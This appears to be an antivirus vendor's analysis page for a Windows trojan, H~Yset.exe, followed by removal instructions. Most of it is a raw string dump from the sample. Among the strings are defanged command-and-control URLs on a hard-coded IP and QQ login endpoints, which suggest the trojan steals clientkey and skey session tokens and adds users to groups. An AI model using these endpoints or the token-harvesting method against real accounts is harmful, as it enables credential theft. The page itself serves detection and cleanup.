0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Stream error in the HTTP/2 framing layer
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
SEC_E_CERT_EXPIRED
SEC_E_CERT_UNKNOWN
SEC_E_CERT_WRONG_USAGE
SEC_E_KDC_CERT_EXPIRED
SEC_E_KDC_CERT_REVOKED
SEC_E_NO_KERB_KEY
SEC_E_NO_S4U_PROT_SUPPORT
SEC_E_QOP_NOT_SUPPORTED
SEC_E_SMARTCARD_CERT_EXPIRED
SEC_E_SMARTCARD_CERT_REVOKED
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
SEC_E_UNSUPPORTED_FUNCTION
SEC_E_UNSUPPORTED_PREAUTH
SEC_E_ILLEGAL_MESSAGE (0xX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.
%s (0xX)
%s - %s
schannel: SSL/TLS connection with %s port %hu (step 1/3)
schannel: incremented credential handle refcount = %d
schannel: disabled server certificate revocation checks
schannel: checking server certificate revocation
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates.
Schannel: TLS 1.3 is not yet supported
Unrecognized parameter passed via CURLOPT_SSLVERSION
schannel: SNI or certificate check failed: %s
schannel: AcquireCredentialsHandle failed: %s
schannel: using IP address, SNI is not supported by OS.
schannel: initial InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 2/3)
schannel: a client certificate has been requested
schannel: next InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 3/3)
schannel: failed to retrieve remote cert context
select/poll on SSL/TLS socket, errno: %d
select/poll on SSL socket, errno: %d
schannel: Curl_read_plain returned CURLE_AGAIN
schannel: Curl_read_plain returned CURLE_RECV_ERROR
schannel: Curl_read_plain returned error %d
schannel: failed to read data from server: %s
schannel: shutting down SSL/TLS connection with %s port %hu
schannel: ApplyControlToken failure: %s
schannel: failed to send close msg: %s (bytes written: %zd)
%c%c==
%c%c%c=
%c%c%c%c
CLIENT libcurl 7.53.1
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s%s%s
Unable to read the CSeq header: [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
curl
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
Access denied. %c
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
SMTP
SMTPS
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
STARTTLS denied, code %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
PORT
FTPS
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
MDTM %s
APPE %s
STOR %s
RETR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
Failed FTP upload: 
RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
login
password
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4%s: connecting to HTTP proxy %s port %d
SOCKS4 communication to %s:%d
SOCKS4 connect to IPv4 %s (locally resolved)
SOCKS4 connection to %s not supported
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
SOCKS5: connecting to HTTP proxy %s port %d
SOCKS5 communication to %s:%d
User was rejected by the SOCKS5 server (%d %d).
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 connect to IPv4 %s (locally resolved)
SOCKS5 connection to %s not supported
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
Content-Length: in d response
Transfer-Encoding: in d response
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
NTLM handshake failure (type-3 message): Status=%x
%sAuthorization: Negotiate %s
2.5.4.3
2.5.29.17
1.2.840.10040.4.1
1.2.840.10040.4.3
1.2.840.10045.2.1
ecPublicKey
1.2.840.10045.3.0.1
1.2.840.10045.4.1
1.2.840.10046.2.1
1.2.840.113549.1.1.1
1.2.840.113549.1.1.2
1.2.840.113549.1.1.4
1.2.840.113549.1.1.5
1.2.840.113549.1.1.10
1.2.840.113549.1.1.14
1.2.840.113549.1.1.11
1.2.840.113549.1.1.12
1.2.840.113549.1.1.13
1.2.840.113549.2.2
1.2.840.113549.2.5
1.3.14.3.2.26
2.5.4.4
2.5.4.5
2.5.4.6
2.5.4.7
2.5.4.8
2.5.4.9
2.5.4.10
2.5.4.11
2.5.4.12
2.5.4.13
2.5.4.17
2.5.4.41
2.5.4.42
2.5.4.43
2.5.4.44
2.5.4.45
2.5.4.46
2.5.4.65
1.2.840.113549.1.9.1
2.5.4.72
2.5.29.18
2.5.29.19
2.16.840.1.101.3.4.2.4
2.16.840.1.101.3.4.2.1
2.16.840.1.101.3.4.2.2
2.16.840.1.101.3.4.2.3
x:
%s%lx
%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s
%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s
%s: %s
RSA Public Key (%lu bits)
RSA Public Key
dsa(pub_key)
dh(pub_key)
- Subject: %s
Issuer: %s
Serial Number: %s
Signature Algorithm: %s
Start Date: %s
Expire Date: %s
Public Key Algorithm
Public Key Algorithm: %s
Signature: %s
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----
Cert
KGS!@#$%server response timeout
LOGIN
Unsupported SASL authentication mechanism
0123456789-
SSPI error: %s failed: %s
rcmd
%s/%s
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SOCKS5 server supports GSS-API %s data protection.
Invalid SSPI encryption response type (%u %u).
SOCKS5 access with%s protection granted.
%s xxxxxxxxxxxxxxxx
user=%s
auth=Bearer %s
host=%s
port=%ld
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
%d.%d.%d (%s) 0x%x-0x%x
MDp_%d_(
).dmp
GET %s HTTP/1.1
Host: %s%s
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
HTTP/1.1
HTTP/1.0
@1_360.exe
%d.%d.%d.%d
xlurl
descr_downurl
list_url
list_cmd
%s /S
/select, %s
%s:%d
&type=%d
POST %s HTTP/1.1
Host: %s
Content-Length: %d
Content-Type:application/x-www-form-urlencoded
kic.disk
mzd.live
kb.mdisk
<4,$?7/'
(3-!0,1'8"5.*2$
%s%d.%d
hXXp://
E:\[Project]\[BaizhuLocalStorage]\Output\Release\BZDownload.pdb
zcÁ
.?AVduReportView@@
.?AV?$CSingleton@VCDownloadAppDataReport@@@QSUtil@@
.?AVCDownloadAppDataReport@@
.?AVCTaskParam2@?$CTaskMgrHelper@VCDownloadAppDataReport@@@minilib@@
.?AVCCURLWrapper@@
.?AVCWebContainer@@
libcurl/7.53.1 WinSSL
%I%X,
.QAY9E?
PeekNamedPipe
GetCPInfo
GetProcessHeap
RegOpenKeyExA
RegCloseKey
CryptImportKey
CryptDestroyKey
CertFreeCertificateContext
GetViewportOrgEx
SetViewportOrgEx
GdiplusShutdown
ShellExecuteW
ShellExecuteA
GetKeyState
WinHttpReadData
WinHttpAddRequestHeaders
WinHttpQueryDataAvailable
WinHttpOpenRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpSendRequest
WinHttpCrackUrl
WinHttpSetTimeouts
:?49) 3)
%9q%S
4448407
(;(=( 65\;U90(F50%0;(?P1O8@0)%(A2TE';@20A2:#:08.089LH _U,B&  ;75JO717150 00% 657W?;%F<<V6#
.text
`.rdata
@.data
@.rsrc
@.reloc
error: [%s] is repeated
%s_%s_%s
reportview
config.xml
DirectUI.js
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
version="%s"
encoding="%s"
standalone="%s"
[%d]%s
RGB(%d,%d,%d)
(%d,%d)
OnVScroll Error pos[%d]
VertScrollBar Show[%d]
HorzScrollBar Show[%d]
duReportView
nSel :%d
ShockwaveFlash.ShockwaveFlash
AddResObj [%s] failed
<Unknown:%d>
failed to loading image[%s]
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
nMozilla post test/1.0
data.goosai.com
x/report/exception
kernel32.dll
page1_check_lk_%d
page1_check_lk_text_%d
page1_check_hk_%d
page1_check_hk_text_%d
page1_bottom_check_group%d
page1_btn_icon_%d
page1_icon_%d
page1_title_%d
page1_check_item_text_%d
page1_check_item_%d
page1_desc_%d
page1_list_item_%d
%.02f %s
page3_check_lk_%d
page3_check_lk_text_%d
page3_check_hk_%d
page3_check_hk_text_%d
page3_bottom_check_group%d
page3_btn_icon_%d
page3_icon_%d
page3_title_%d
page3_check_item_text_%d
page3_check_item_%d
page3_desc_%d
page3_list_item_%d
page3_bottom_check_lk_%d
ntdll.dll
Kernel32.dll
errorUrl
Shell.Explorer
c:\%original file name%.exe

H~Yset.exe_2944:

.text
`.rdata
@.data
.rsrc
.aspack
.adata
t$(SSh
u.hXeM
~%UVW
u$SShe
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ntdll.dll
wininet.dll
user32.dll
shlwapi.dll
gdi32.dll
Kernel32.dll
Shlwapi.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
MapVirtualKeyA
113.17.184.163
/love/cpa06.asp?mac=
hXXp://
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
@Windows 10
Windows Server Technical Preview
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 2000
Windows XP
Windows Server 2003 R2,
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003,
Windows 98
Web Server Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
hXXp://1212.ip138.com/ic.asp
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
5B3838F5-0C81-46D9-A4C0-6EA28CA3E942
/mac2/hy.txt
hXXp://113.17.184.163/love/api.asp?type=a
Common.dll
@`AMainFrame.dll
.@&website=VVV.qq.com
&fromSubId=1&subcmd=all&uin=
/love/api.asp?type=b&uid=
/mac2/yqh.txt
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_uins?callback=ptui_getuins_CB&r=0.7478418888058513&pt_local_tk=0.3858416392467916
hXXp://localhost.ptlogin2.qq.com:4300/pt_get_st?clientuin=
clientkey
&keyindex=9&pt_aid=549000912&daid=5&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
p_uin=; p_skey=; pt4_token=;
length = str.length; i < length; i  ) {
hash = hash * 33   str.charCodeAt(i)
hXXp://ptlogin2.qq.com/pt4_auth?daid=73&appid=715030901&auth_token=
®master=&aid=715030901&s_url=http://connect.qq.com/widget/shareqq/success.html
; skey=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?groupcount=4&count=4&callbackFun=_GetGroupPortal&uin=
hXXp://qun.qq.com/cgi-bin/qun_mgr/add_group_member
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
SHLWAPI.dll
MPR.dll
WINMM.dll
WS2_32.dll
VERSION.dll
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
WSOCK32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
VVV.dywt.com.cn
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
right-curly-bracket
left-curly-bracket
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe
#include "l.chs\afxres.rc" // Standard components
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
winmm.dll
rasapi32.dll
winspool.drv
advapi32.dll
shell32.dll
comctl32.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
(*.*)

H~Yset.exe_2944_rwx_0051B000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
winmm.dll
ws2_32.dll
rasapi32.dll
gdi32.dll
winspool.drv
advapi32.dll
shell32.dll
ole32.dll
oleaut32.dll
comctl32.dll
wininet.dll
comdlg32.dll
RegCloseKey
ShellExecuteA
InternetCanonicalizeUrlA
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\H~Yset.exe (190217 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B86.tmp (5873 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ic[1].htm (219 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7BA7.tmp (1425 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7B57.tmp (7971 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
